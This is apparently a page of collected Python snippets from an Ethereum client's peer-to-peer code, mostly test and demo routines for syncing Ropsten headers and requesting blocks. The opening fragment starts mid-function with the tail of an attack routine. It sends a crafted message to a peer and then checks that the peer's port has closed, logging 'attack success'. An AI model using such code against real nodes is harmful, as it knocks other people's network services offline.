        peer.sub_proto.send(header, body)
        await asyncio.sleep(1)
        result = port_probe(ip, port)
        if not result:
            peer_pool.logger.info('The port is closed, attack success ...')
            os.kill(os.getpid(), signal.SIGINT)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        loop.stop()

    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(attack())
    loop.run_forever()
    loop.close()
Esempio n. 22
0
def _test() -> None:
    import argparse
    from pathlib import Path
    import signal

    from evm.db.backends.level import LevelDB
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER

    from p2p import ecies
    from p2p.constants import ROPSTEN_BOOTNODES
    from p2p.peer import ETHPeer

    from trinity.utils.chains import load_nodekey

    from tests.p2p.integration_test_helpers import FakeAsyncHeaderDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB, FakeAsyncRopstenChain

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-debug', action="store_true")
    parser.add_argument('-bootnodes', type=str, default=[])
    parser.add_argument('-nodekey', type=str)

    args = parser.parse_args()

    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s',
                        datefmt='%H:%M:%S')
    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG
    logging.getLogger('p2p.server.Server').setLevel(log_level)

    loop = asyncio.get_event_loop()
    db = LevelDB(args.db)
    headerdb = FakeAsyncHeaderDB(db)
    chaindb = FakeAsyncChainDB(db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    chain = FakeAsyncRopstenChain(db)

    # NOTE: Since we may create a different priv/pub key pair every time we run this, remote nodes
    # may try to establish a connection using the pubkey from one of our previous runs, which will
    # result in lots of DecryptionErrors in receive_handshake().
    if args.nodekey:
        privkey = load_nodekey(Path(args.nodekey))
    else:
        privkey = ecies.generate_privkey()

    port = 30303
    if args.bootnodes:
        bootstrap_nodes = args.bootnodes.split(',')
    else:
        bootstrap_nodes = ROPSTEN_BOOTNODES
    bootstrap_nodes = [Node.from_uri(enode) for enode in bootstrap_nodes]

    server = Server(
        privkey,
        port,
        chain,
        chaindb,
        headerdb,
        db,
        RopstenChain.network_id,
        peer_class=ETHPeer,
        bootstrap_nodes=bootstrap_nodes,
    )

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint():
        await sigint_received.wait()
        await server.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(server.run())
    loop.run_forever()
    loop.close()
Esempio n. 23
0
async def _main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-light', action="store_true")
    parser.add_argument('-nodekey', type=str)
    parser.add_argument('-enode',
                        type=str,
                        required=False,
                        help="The enode we should connect to")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s',
                        datefmt='%H:%M:%S')
    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    loop = asyncio.get_event_loop()

    base_db = LevelDB(args.db)
    headerdb = AsyncHeaderDB(AtomicDB(base_db))
    chaindb = AsyncChainDB(AtomicDB(base_db))
    try:
        genesis = chaindb.get_canonical_block_header_by_number(BlockNumber(0))
    except HeaderNotFound:
        genesis = ROPSTEN_GENESIS_HEADER
        chaindb.persist_header(genesis)

    peer_pool_class: Type[Union[ETHPeerPool, LESPeerPool]] = ETHPeerPool
    if args.light:
        peer_pool_class = LESPeerPool

    chain_class: Union[Type[AsyncRopstenChain], Type[AsyncMainnetChain]]
    if genesis.hash == ROPSTEN_GENESIS_HEADER.hash:
        chain_id = RopstenChain.chain_id
        vm_config = ROPSTEN_VM_CONFIGURATION
        chain_class = AsyncRopstenChain
    elif genesis.hash == MAINNET_GENESIS_HEADER.hash:
        chain_id = MainnetChain.chain_id
        vm_config = MAINNET_VM_CONFIGURATION  # type: ignore
        chain_class = AsyncMainnetChain
    else:
        raise RuntimeError("Unknown genesis: %s", genesis)

    if args.nodekey:
        privkey = load_nodekey(Path(args.nodekey))
    else:
        privkey = ecies.generate_privkey()

    context = ChainContext(
        headerdb=headerdb,
        network_id=chain_id,
        vm_configuration=vm_config,
        client_version_string=construct_trinity_client_identifier(),
        listen_port=30309,
        p2p_version=DEVP2P_V5,
    )

    peer_pool = peer_pool_class(privkey=privkey, context=context)

    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[chain_id]

    async with background_asyncio_service(peer_pool) as manager:
        manager.run_task(connect_to_peers_loop(peer_pool,
                                               nodes))  # type: ignore
        chain = chain_class(base_db)
        syncer: Service = None
        if args.light:
            syncer = LightChainSyncer(chain, headerdb,
                                      cast(LESPeerPool, peer_pool))
        else:
            syncer = RegularChainSyncer(chain, chaindb,
                                        cast(ETHPeerPool, peer_pool))
        logging.getLogger().setLevel(log_level)

        sigint_received = asyncio.Event()
        for sig in [signal.SIGINT, signal.SIGTERM]:
            loop.add_signal_handler(sig, sigint_received.set)

        async def exit_on_sigint() -> None:
            await sigint_received.wait()
            syncer.get_manager().cancel()

        asyncio.ensure_future(exit_on_sigint())

        async with background_asyncio_service(syncer) as syncer_manager:
            await syncer_manager.wait_finished()
Esempio n. 24
0
def _test() -> None:
    import argparse
    from pathlib import Path
    import signal
    from p2p import ecies
    from p2p.kademlia import Node
    from eth.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from eth.chains.mainnet import MainnetChain, MAINNET_GENESIS_HEADER, MAINNET_VM_CONFIGURATION
    from eth.db.backends.level import LevelDB
    from tests.trinity.core.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncMainnetChain, FakeAsyncRopstenChain,
        FakeAsyncHeaderDB, connect_to_peers_loop)
    from trinity.constants import DEFAULT_PREFERRED_NODES
    from trinity.protocol.common.context import ChainContext
    from trinity._utils.chains import load_nodekey

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-fast', action="store_true")
    parser.add_argument('-light', action="store_true")
    parser.add_argument('-nodekey', type=str)
    parser.add_argument('-enode',
                        type=str,
                        required=False,
                        help="The enode we should connect to")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s',
                        datefmt='%H:%M:%S')
    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    loop = asyncio.get_event_loop()

    base_db = LevelDB(args.db)
    headerdb = FakeAsyncHeaderDB(base_db)
    chaindb = FakeAsyncChainDB(base_db)
    try:
        genesis = chaindb.get_canonical_block_header_by_number(0)
    except HeaderNotFound:
        genesis = ROPSTEN_GENESIS_HEADER
        chaindb.persist_header(genesis)

    peer_pool_class: Type[Union[ETHPeerPool, LESPeerPool]] = ETHPeerPool
    if args.light:
        peer_pool_class = LESPeerPool

    if genesis.hash == ROPSTEN_GENESIS_HEADER.hash:
        network_id = RopstenChain.network_id
        vm_config = ROPSTEN_VM_CONFIGURATION  # type: ignore
        chain_class = FakeAsyncRopstenChain
    elif genesis.hash == MAINNET_GENESIS_HEADER.hash:
        network_id = MainnetChain.network_id
        vm_config = MAINNET_VM_CONFIGURATION  # type: ignore
        chain_class = FakeAsyncMainnetChain
    else:
        raise RuntimeError("Unknown genesis: %s", genesis)

    if args.nodekey:
        privkey = load_nodekey(Path(args.nodekey))
    else:
        privkey = ecies.generate_privkey()

    context = ChainContext(
        headerdb=headerdb,
        network_id=network_id,
        vm_configuration=vm_config,
    )

    peer_pool = peer_pool_class(privkey=privkey, context=context)

    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]

    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))
    chain = chain_class(base_db)
    syncer: BaseHeaderChainSyncer = None
    if args.fast:
        syncer = FastChainSyncer(chain, chaindb, cast(ETHPeerPool, peer_pool))
    elif args.light:
        syncer = LightChainSyncer(chain, headerdb,
                                  cast(LESPeerPool, peer_pool))
    else:
        syncer = RegularChainSyncer(chain, chaindb,
                                    cast(ETHPeerPool, peer_pool))
    syncer.logger.setLevel(log_level)
    syncer.min_peers_to_sync = 1

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await syncer.cancel()
        loop.stop()

    async def run() -> None:
        await syncer.run()
        syncer.logger.info("run() finished, exiting")
        sigint_received.set()

    # loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(run())
    loop.run_forever()
    loop.close()
Esempio n. 25
0
def _main() -> None:
    logging.basicConfig(level=DEBUG2_LEVEL_NUM, format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-enode', type=str, help="The enode we should connect to", required=True)
    parser.add_argument('-mainnet', action='store_true')
    parser.add_argument('-light', action='store_true', help="Connect as a light node")
    args = parser.parse_args()

    peer_class: Union[Type[ETHPeer], Type[LESPeer]]
    pool_class: Union[Type[ETHPeerPool], Type[LESPeerPool]]

    if args.light:
        peer_class = LESPeer
        pool_class = LESPeerPool
    else:
        peer_class = ETHPeer
        pool_class = ETHPeerPool

    if args.mainnet:
        chain_id = MainnetChain.chain_id
        vm_config = MAINNET_VM_CONFIGURATION
        genesis = MAINNET_GENESIS_HEADER
    else:
        chain_id = RopstenChain.chain_id
        vm_config = ROPSTEN_VM_CONFIGURATION
        genesis = ROPSTEN_GENESIS_HEADER

    headerdb = AsyncHeaderDB(AtomicDB(MemoryDB()))
    headerdb.persist_header(genesis)
    loop = asyncio.get_event_loop()
    nodes = [Node.from_uri(args.enode)]

    context = ChainContext(
        headerdb=headerdb,
        network_id=chain_id,
        vm_configuration=vm_config,
        client_version_string=construct_trinity_client_identifier(),
        listen_port=30309,
        p2p_version=DEVP2P_V5,
    )
    peer_pool = pool_class(
        privkey=ecies.generate_privkey(),
        context=context,
    )

    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))

    async def request_stuff() -> None:
        # Request some stuff from ropsten's block 2440319
        # (https://ropsten.etherscan.io/block/2440319), just as a basic test.
        nonlocal peer_pool
        while not peer_pool.connected_nodes:
            peer_pool.logger.info("Waiting for peer connection...")
            await asyncio.sleep(0.2)
        peer = peer_pool.highest_td_peer
        headers = await cast(ETHPeer, peer).eth_api.get_block_headers(
            BlockNumber(2440319),
            max_headers=100
        )
        hashes = tuple(header.hash for header in headers)
        if peer_class == ETHPeer:
            peer = cast(ETHPeer, peer)
            peer.eth_api.send_get_block_bodies(hashes)
            peer.eth_api.send_get_receipts(hashes)
        else:
            peer = cast(LESPeer, peer)
            peer.les_api.send_get_block_bodies(list(hashes))
            peer.les_api.send_get_receipts(hashes[0])

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        loop.stop()

    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(request_stuff())
    loop.set_debug(True)
    loop.run_forever()
    loop.close()
Esempio n. 26
0
async def test_lightchain_integration(request, event_loop, caplog):
    """Test LightChainSyncer/LightPeerChain against a running geth instance.

    In order to run this you need to pass the following to pytest:

        pytest --integration --capture=no --enode=...

    If you don't have any geth testnet data ready, it is very quick to generate some with:

        geth --testnet --syncmode full

    You only need the first 11 blocks for this test to succeed. Then you can restart geth with:

        geth --testnet --lightserv 90 --nodiscover
    """
    # TODO: Implement a pytest fixture that runs geth as above, so that we don't need to run it
    # manually.
    if not pytest.config.getoption("--integration"):
        pytest.skip("Not asked to run integration tests")

    # will almost certainly want verbose logging in a failure
    caplog.set_level(logging.DEBUG)

    remote = Node.from_uri(pytest.config.getoption("--enode"))
    base_db = MemoryDB()
    chaindb = FakeAsyncChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    headerdb = FakeAsyncHeaderDB(base_db)
    peer_pool = PeerPool(
        LESPeer,
        FakeAsyncHeaderDB(base_db),
        ROPSTEN_NETWORK_ID,
        ecies.generate_privkey(),
        ROPSTEN_VM_CONFIGURATION,
    )
    chain = FakeAsyncRopstenChain(base_db)
    syncer = LightChainSyncer(chain, chaindb, peer_pool)
    syncer.min_peers_to_sync = 1
    peer_chain = LightPeerChain(headerdb, peer_pool)

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, tuple([remote])))
    asyncio.ensure_future(peer_chain.run())
    asyncio.ensure_future(syncer.run())
    await asyncio.sleep(
        0)  # Yield control to give the LightChainSyncer a chance to start

    def finalizer():
        event_loop.run_until_complete(peer_pool.cancel())
        event_loop.run_until_complete(peer_chain.cancel())
        event_loop.run_until_complete(syncer.cancel())

    request.addfinalizer(finalizer)

    n = 11

    # Wait for the chain to sync a few headers.
    async def wait_for_header_sync(block_number):
        while headerdb.get_canonical_head().block_number < block_number:
            await asyncio.sleep(0.1)

    await asyncio.wait_for(wait_for_header_sync(n), 5)

    # https://ropsten.etherscan.io/block/11
    header = headerdb.get_canonical_block_header_by_number(n)
    body = await peer_chain.get_block_body_by_hash(header.hash)
    assert len(body['transactions']) == 15

    receipts = await peer_chain.get_receipts(header.hash)
    assert len(receipts) == 15
    assert encode_hex(keccak(rlp.encode(receipts[0]))) == (
        '0xf709ed2c57efc18a1675e8c740f3294c9e2cb36ba7bb3b89d3ab4c8fef9d8860')

    assert len(peer_pool) == 1
    head_info = peer_pool.highest_td_peer.head_info
    head = await peer_chain.get_block_header_by_hash(head_info.block_hash)
    assert head.block_number == head_info.block_number

    # In order to answer queries for contract code, geth needs the state trie entry for the block
    # we specify in the query, but because of fast sync we can only assume it has that for recent
    # blocks, so we use the current head to lookup the code for the contract below.
    # https://ropsten.etherscan.io/address/0x95a48dca999c89e4e284930d9b9af973a7481287
    contract_addr = decode_hex('0x8B09D9ac6A4F7778fCb22852e879C7F3B2bEeF81')
    contract_code = await peer_chain.get_contract_code(head.hash,
                                                       contract_addr)
    assert encode_hex(contract_code) == '0x600060006000600060006000356000f1'

    account = await peer_chain.get_account(head.hash, contract_addr)
    assert account.code_hash == keccak(contract_code)
    assert account.balance == 0
Esempio n. 27
0
    def __init__(self,
                 network_id: int,
                 genesis_config: Dict[str, Any] = None,
                 max_peers: int = 25,
                 trinity_root_dir: str = None,
                 data_dir: str = None,
                 nodekey_path: str = None,
                 logfile_path: str = None,
                 nodekey: PrivateKey = None,
                 sync_mode: str = SYNC_FULL,
                 port: int = 30303,
                 use_discv5: bool = False,
                 preferred_nodes: Tuple[KademliaNode, ...] = None,
                 bootstrap_nodes: Tuple[KademliaNode, ...] = None) -> None:
        self.network_id = network_id
        self.max_peers = max_peers
        self.sync_mode = sync_mode
        self.port = port
        self.use_discv5 = use_discv5

        if genesis_config is not None:
            self.genesis_config = genesis_config
        elif network_id in PRECONFIGURED_NETWORKS:
            self.genesis_config = _load_preconfigured_genesis_config(
                network_id)
        else:
            raise TypeError(
                "No `genesis_config` was provided and the `network_id` is not "
                "in the known preconfigured networks.  Cannot initialize "
                "ChainConfig")

        if trinity_root_dir is not None:
            self.trinity_root_dir = trinity_root_dir

        if not preferred_nodes and self.network_id in DEFAULT_PREFERRED_NODES:
            self.preferred_nodes = DEFAULT_PREFERRED_NODES[self.network_id]
        else:
            self.preferred_nodes = preferred_nodes

        if bootstrap_nodes is None:
            if self.network_id == MAINNET_NETWORK_ID:
                self.bootstrap_nodes = tuple(
                    KademliaNode.from_uri(enode)
                    for enode in MAINNET_BOOTNODES)
            elif self.network_id == ROPSTEN_NETWORK_ID:
                self.bootstrap_nodes = tuple(
                    KademliaNode.from_uri(enode)
                    for enode in ROPSTEN_BOOTNODES)
        else:
            self.bootstrap_nodes = bootstrap_nodes

        if data_dir is not None:
            self.data_dir = data_dir

        if nodekey is not None and nodekey_path is not None:
            raise ValueError(
                "It is invalid to provide both a `nodekey` and a `nodekey_path`"
            )
        elif nodekey_path is not None:
            self.nodekey_path = nodekey_path
        elif nodekey is not None:
            self.nodekey = nodekey

        if logfile_path is not None:
            self.logfile_path = logfile_path
Esempio n. 28
0
def _test() -> None:
    """
    Create a Peer instance connected to a local geth instance and log messages exchanged with it.

    Use the following command line to run geth:

        ./build/bin/geth -vmodule p2p=4,p2p/discv5=0,eth/*=0 \
          -nodekeyhex 45a915e4d060149eb4365960e6a7a45f334393093061116b197e3240065ff2d8 \
          -testnet -lightserv 90
    """
    import argparse
    import signal
    from eth.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from eth.db.backends.memory import MemoryDB
    from eth.tools.logging import TRACE_LEVEL_NUM
    from trinity.protocol.eth.peer import ETHPeer
    from trinity.protocol.les.peer import LESPeer
    from tests.trinity.core.integration_test_helpers import FakeAsyncHeaderDB, connect_to_peers_loop
    logging.basicConfig(level=TRACE_LEVEL_NUM,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-enode',
                        type=str,
                        help="The enode we should connect to")
    parser.add_argument('-light',
                        action='store_true',
                        help="Connect as a light node")
    args = parser.parse_args()

    peer_class: Type[BasePeer] = ETHPeer
    if args.light:
        peer_class = LESPeer
    headerdb = FakeAsyncHeaderDB(MemoryDB())
    headerdb.persist_header(ROPSTEN_GENESIS_HEADER)
    network_id = RopstenChain.network_id
    loop = asyncio.get_event_loop()
    nodes = [Node.from_uri(args.enode)]

    peer_pool = PeerPool(
        peer_class,
        headerdb,
        network_id,
        ecies.generate_privkey(),
        ROPSTEN_VM_CONFIGURATION,
    )

    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))

    async def request_stuff() -> None:
        # Request some stuff from ropsten's block 2440319
        # (https://ropsten.etherscan.io/block/2440319), just as a basic test.
        nonlocal peer_pool
        while not peer_pool.connected_nodes:
            peer_pool.logger.info("Waiting for peer connection...")
            await asyncio.sleep(0.2)
        peer = peer_pool.highest_td_peer
        headers = await cast(ETHPeer,
                             peer).requests.get_block_headers(2440319,
                                                              max_headers=100)
        hashes = tuple(header.hash for header in headers)
        if peer_class == ETHPeer:
            peer = cast(ETHPeer, peer)
            peer.sub_proto._send_get_block_bodies(hashes)
            peer.sub_proto._send_get_receipts(hashes)
        else:
            peer = cast(LESPeer, peer)
            request_id = 1
            peer.sub_proto.send_get_block_bodies(list(hashes), request_id + 1)
            peer.sub_proto.send_get_receipts(hashes[0], request_id + 2)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        loop.stop()

    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(request_stuff())
    loop.set_debug(True)
    loop.run_forever()
    loop.close()
Esempio n. 29
0
def _test() -> None:
    import argparse
    import signal
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from eth.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from eth.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncRopstenChain, FakeAsyncHeaderDB, connect_to_peers_loop)

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-fast', action="store_true")
    parser.add_argument('-light', action="store_true")
    parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    logging.basicConfig(
        level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s', datefmt='%H:%M:%S')
    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    loop = asyncio.get_event_loop()

    base_db = LevelDB(args.db)
    chaindb = FakeAsyncChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    headerdb = FakeAsyncHeaderDB(base_db)

    peer_class: Type[HeaderRequestingPeer] = ETHPeer
    if args.light:
        peer_class = LESPeer
    network_id = RopstenChain.network_id
    privkey = ecies.generate_privkey()
    peer_pool = PeerPool(peer_class, headerdb, network_id, privkey, ROPSTEN_VM_CONFIGURATION)
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    chain = FakeAsyncRopstenChain(base_db)
    syncer: BaseHeaderChainSyncer = None
    if args.fast:
        syncer = FastChainSyncer(chain, chaindb, peer_pool)
    elif args.light:
        syncer = LightChainSyncer(chain, headerdb, peer_pool)
    else:
        syncer = RegularChainSyncer(chain, chaindb, peer_pool)
    syncer.logger.setLevel(log_level)
    syncer.min_peers_to_sync = 1

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await syncer.cancel()
        loop.stop()

    async def run() -> None:
        await syncer.run()
        syncer.logger.info("run() finished, exiting")
        sigint_received.set()

    # loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(run())
    loop.run_forever()
    loop.close()
Esempio n. 30
0
async def _main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument('-enode',
                        type=str,
                        help="The enode we should connect to",
                        required=True)
    parser.add_argument('-mainnet', action='store_true')
    parser.add_argument('-light',
                        action='store_true',
                        help="Connect as a light node")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = DEBUG2_LEVEL_NUM
    logging.basicConfig(level=log_level,
                        format='%(asctime)s %(levelname)s: %(message)s',
                        datefmt='%H:%M:%S')

    peer_class: Union[Type[ETHPeer], Type[LESPeer]]
    pool_class: Union[Type[ETHPeerPool], Type[LESPeerPool]]

    if args.light:
        peer_class = LESPeer
        pool_class = LESPeerPool
    else:
        peer_class = ETHPeer
        pool_class = ETHPeerPool

    bootnodes: Tuple[str, ...]
    if args.mainnet:
        bootnodes = MAINNET_BOOTNODES
        chain_id = MainnetChain.chain_id
        vm_config = MAINNET_VM_CONFIGURATION
        genesis = MAINNET_GENESIS_HEADER
    else:
        bootnodes = ROPSTEN_BOOTNODES
        chain_id = RopstenChain.chain_id
        vm_config = ROPSTEN_VM_CONFIGURATION
        genesis = ROPSTEN_GENESIS_HEADER

    headerdb = AsyncHeaderDB(AtomicDB(MemoryDB()))
    headerdb.persist_header(genesis)
    loop = asyncio.get_event_loop()
    if args.enode == "bootnodes":
        nodes = [Node.from_uri(enode) for enode in bootnodes]
    else:
        nodes = [Node.from_uri(args.enode)]

    context = ChainContext(
        headerdb=headerdb,
        network_id=chain_id,
        vm_configuration=vm_config,
        client_version_string=construct_trinity_client_identifier(),
        listen_port=30309,
        p2p_version=DEVP2P_V5,
    )
    peer_pool = pool_class(privkey=ecies.generate_privkey(), context=context)

    async def request_stuff() -> None:
        nonlocal peer_pool
        # Request some stuff from ropsten's block 2440319
        # (https://ropsten.etherscan.io/block/2440319), just as a basic test.
        peer = peer_pool.highest_td_peer
        if peer_class == ETHPeer:
            peer = cast(ETHPeer, peer)
            headers = await peer.eth_api.get_block_headers(
                BlockNumber(2440319), max_headers=100)
            hashes = tuple(header.hash for header in headers)
            peer.eth_api.send_get_block_bodies(hashes)
            peer.eth_api.send_get_receipts(hashes)
        else:
            peer = cast(LESPeer, peer)
            headers = await peer.les_api.get_block_headers(
                BlockNumber(2440319), max_headers=100)
            peer.les_api.send_get_block_bodies(list(hashes))
            peer.les_api.send_get_receipts(hashes[:1])

    async with background_asyncio_service(peer_pool) as manager:
        for sig in [signal.SIGINT, signal.SIGTERM]:
            loop.add_signal_handler(sig, manager.cancel)

        await peer_pool.connect_to_nodes(nodes)
        await asyncio.sleep(1)
        if len(peer_pool) == 0:
            peer_pool.logger.error(f"Unable to connect to any of {nodes}")
            return

        try:
            await asyncio.wait_for(request_stuff(), timeout=2)
        except asyncio.TimeoutError:
            peer_pool.logger.error("Timeout waiting for replies")
        await manager.wait_finished()